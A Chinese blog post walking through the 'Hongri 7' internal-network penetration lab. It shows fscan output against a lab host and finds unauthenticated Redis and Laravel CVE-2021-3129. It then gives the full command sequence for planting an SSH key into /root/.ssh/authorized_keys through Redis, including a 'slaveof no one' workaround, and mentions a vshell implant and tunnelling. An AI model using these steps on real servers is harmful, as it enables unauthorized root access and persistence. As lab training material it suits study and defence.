内网渗透-项目3三层网络

红日7

信息搜集

10.10.0.108

目标扫描

使用fscan对目标进行扫描:

PS> .\fscan.exe -h 10.10.0.108
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-19 16:17:27] [INFO] 暴力破解线程数: 1
[2025-04-19 16:17:27] [INFO] 开始信息扫描
[2025-04-19 16:17:27] [INFO] 最终有效主机数量: 1
[2025-04-19 16:17:27] [INFO] 开始主机扫描
[2025-04-19 16:17:28] [INFO] 有效端口数量: 233
[2025-04-19 16:17:28] [SUCCESS] 端口开放 10.10.0.108:22
[2025-04-19 16:17:28] [SUCCESS] 端口开放 10.10.0.108:81
[2025-04-19 16:17:28] [SUCCESS] 端口开放 10.10.0.108:6379
[2025-04-19 16:17:28] [SUCCESS] 端口开放 10.10.0.108:80
[2025-04-19 16:17:28] [SUCCESS] 服务识别 10.10.0.108:22 => [ssh] 版本:7.6p1 Ubuntu 4ubuntu0.4 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.4.]
[2025-04-19 16:17:33] [SUCCESS] 服务识别 10.10.0.108:6379 => [redis] 版本:2.8.17 产品:Redis key-value store
[2025-04-19 16:17:33] [SUCCESS] 服务识别 10.10.0.108:81 => [http] 版本:1.14.0 产品:nginx 系统:Linux 信息:Ubuntu
[2025-04-19 16:17:33] [SUCCESS] 服务识别 10.10.0.108:80 => [http] 版本:1.14.0 产品:nginx 系统:Linux 信息:Ubuntu
[2025-04-19 16:17:38] [INFO] 存活端口数量: 4
[2025-04-19 16:17:38] [INFO] 开始漏洞扫描
[2025-04-19 16:17:38] [INFO] 加载的插件: redis, ssh, webpoc, webtitle
[2025-04-19 16:17:38] [SUCCESS] 网站标题 http://10.10.0.108        状态码:502 长度:584    标题:502 Bad Gateway
[2025-04-19 16:17:40] [SUCCESS] 网站标题 http://10.10.0.108:81     状态码:200 长度:17474  标题:Laravel
[2025-04-19 16:17:40] [SUCCESS] 发现指纹 目标: http://10.10.0.108:81     指纹: [Laravel]
[2025-04-19 16:17:41] [SUCCESS] Redis 10.10.0.108:6379 发现未授权访问 文件位置:/home/web/dump.rdb
[2025-04-19 16:17:43] [SUCCESS] Redis 10.10.0.108:6379 可写入路径 /root/.ssh/
[2025-04-19 16:17:43] [SUCCESS] Redis 10.10.0.108:6379 可写入路径 /var/spool/cron/
[2025-04-19 16:17:46] [SUCCESS] Redis无密码连接成功: 10.10.0.108:6379
[2025-04-19 16:17:55] [SUCCESS] 目标: http://10.10.0.108:81
  漏洞类型: poc-yaml-laravel-cve-2021-3129
  漏洞名称:
  详细信息:
        author:Jarcis-cy(https://github.com/Jarcis-cy)
        links:https://github.com/vulhub/vulhub/blob/master/laravel/CVE-2021-3129
[2025-04-19 16:18:35] [SUCCESS] 扫描已完成: 6/6

信息汇总

开放端口与服务

端口 服务 版本/详细信息
22 SSH OpenSSH 7.6p1 Ubuntu 4ubuntu0.4(系统:Ubuntu Linux)
80 HTTP Nginx 1.14.0(系统:Ubuntu) 状态码:502(Bad Gateway)
81 HTTP Nginx 1.14.0(系统:Ubuntu) Web框架:Laravel(标题:Laravel)
6379 Redis Redis 2.8.17(未授权访问漏洞)

关键漏洞与风险

  1. Redis 未授权访问漏洞 (6379端口)
    • 风险等级: ⚠️ 高危
    • 漏洞详情:
      • 可无密码直接连接。
      • 可写入敏感路径:
        • /root/.ssh/(可注入SSH公钥实现远程登录)
        • /var/spool/cron/(可写入定时任务实现持久化攻击)
      • 数据文件位置:/home/web/dump.rdb(可能包含敏感信息)。
  2. Laravel RCE漏洞 (81端口)
    • 漏洞编号: CVE-2021-3129
    • 风险等级: ⚠️ 高危
    • 漏洞详情:
      • 影响Laravel框架的Debug模式,允许远程代码执行(RCE)。
      • 利用链涉及反序列化和文件写入。

漏洞利用

Redis未授权

在前面的扫描结果中,提示可以进行写公钥:

ssh-keygen -t rsa
cd /root/.ssh/
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt
cat key.txt | redis-cli -h 10.10.0.108 -x set xxx
# 以上步骤在自己的攻击机器上执行

redis-cli -h 10.10.0.108 -p 6379  # 连接到目标redis
config set dir /root/.ssh/
config set dbfilename authorized_keys
save
exit  # 退出redis

# 连接ssh
cd /root/.ssh/
ssh -i id_rsa root@10.10.0.108

PS:执行写公钥过程中执行命令时报错:

┌──(root㉿kali)-[~/.ssh]
└─# cat key.txt | redis-cli -h 10.10.0.108 -x set xxx
(error) READONLY You can't write against a read only slave.

原因:表示当前redis服务是只读的,没有写权限。

解决方法:

  • 1.打开redis服务对应的配置文件,把其中的属性slave-read-only的值修改为no
  • 2.通过redis-cli命令打开客户端模式,输入slaveof no one命令,让当前redis服务停止接收其他redis服务的同步,同时把自己升格为主数据库。(这里采用此方法)

成功拿下root权限shell:

image-20250419173355157

上线vshell

执行vshell的上线命令,上线vshell:

image-20250419173832909

执行后成功上线:

image-20250419174325560

image-20250419174457329

后续建立socks5隧道通信,使用proxifier建立连接(略)。

内网横向

信息搜集

网络信息搜集

查看当前主机网卡信息

root@ubuntu:/usr/bin# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:7a:63:21 brd ff:ff:ff:ff:ff:ff
    inet 10.10.0.108/24 brd 10.10.0.255 scope global dynamic ens33
       valid_lft 4172sec preferred_lft 4172sec
    inet6 fe80::20c:29ff:fe7a:6321/64 scope link 
       valid_lft forever preferred_lft forever
3: ens38: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:7a:63:2b brd ff:ff:ff:ff:ff:ff
    inet 192.168.52.10/24 brd 192.168.52.255 scope global ens38
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe7a:632b/64 scope link 
       valid_lft forever preferred_lft forever

可以看到当前主机有两个ip:

  • 10.10.0.108/24:对外ip
  • 192.168.52.10/24:内网ip

fsan扫描

使用fscan进行存活主机扫描

剩余内容略

posted @ 2025-12-03 09:21  shinianyunyan  阅读(14)  评论(0)    收藏  举报